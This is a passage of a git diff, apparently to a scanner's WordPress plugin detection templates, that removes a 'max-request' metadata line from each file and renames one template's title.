     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -1,13 +1,12 @@
 id: wordpress-instagram-feed
 
 info:
-  name: Smash Balloon Social Photo Feed Detection
+  name: Smash Balloon Social Photo Feed – Best Social Feed Plugin for WordPress Detection
   author: ricardomaia
   severity: info
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
